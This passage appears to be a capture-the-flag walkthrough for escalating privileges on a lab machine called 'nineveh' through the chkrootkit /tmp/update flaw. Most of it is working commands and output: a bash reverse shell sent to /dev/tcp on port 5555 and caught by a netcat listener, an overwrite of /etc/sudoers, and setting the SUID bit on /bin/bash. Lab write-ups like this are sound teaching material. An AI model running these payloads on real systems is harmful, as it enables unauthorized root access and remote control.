Chkrootkit Exploit Link to heading

I have tried pspy and i could see the chkrootkit

Lets search for the exploit

As per this exploit if you create any exploit ,if you create a file named “update” under /tmp.

amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update 

Or You can use EOF to repalce printf command like below

cat > /tmp/update << EOF
#!/bin/sh
/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.3/5555 0<&1"
touch /tmp/done1
EOF
cat > /tmp/update << EOF
> #!/bin/sh
> /bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.3/5555 0<&1"
> touch /tmp/done1
> EOF
chmod +x update 
chmod +x update 

Once a update file is run, it creates another file called “done1” . This is to make sure that the cron job run.

cat update
#!/bin/sh
/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.3/5555 0<&1"
touch /tmp/done1
ls
ls
done
done1
f
systemd-private-ba77cd94f86e45d0af4d9efa97684ddf-systemd-timesyncd.service-afK3Yj
update
vmware-root

Once the chkroot cron runs we will get reverse shell

└─$ rlwrap nc -nvlp 5555                                                                                                                                                1 ⨯
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49824

whoami
root
pwd
/root

Other method: to add the existing user to sudoers to escalate the privilege Link to heading

amrois@nineveh:/tmp$ echo 'echo "amrois ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > update
amrois@nineveh:/tmp$ chmod +x update
amrois@nineveh:/tmp$ sudo bash
amrois@nineveh:/tmp$ sudo bash
root@nineveh:/tmp# whoami
root
root@nineveh:/tmp# 

You can set SUID bit also /bin/bash Link to heading

Use the below code on /tmp/update

cat > /tmp/update << EOF
#!/bin/bash

chmod +s /bin/bash
touch /tmp/done3
EOF
chmod +x /tmp/update

It creates file “done3” after the script run. To get a privileged shell run “bash -p -i”

ls -l 
ls -l 
total 12
-rw-r--r-- 1 root     root        0 Mar 19 19:56 done
-rw-r--r-- 1 root     root        0 Mar 19 20:58 done1
-rw-r--r-- 1 root     root        0 Mar 19 21:00 done3
prw-r--r-- 1 www-data www-data    0 Mar 19 21:00 f
drwx------ 3 root     root     4096 Mar 18 19:56 systemd-private-ba77cd94f86e45d0af4d9efa97684ddf-systemd-timesyncd.service-afK3Yj
-rwxr-xr-x 1 www-data www-data   49 Mar 19 20:58 update
drwx------ 2 root     root     4096 Mar 18 19:56 vmware-root
ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jun 24  2016 /bin/bash
bash-4.3$ 

whoami
whoami
www-data
bash -p
bash -p
whoami
whoami
root
bash-4.3#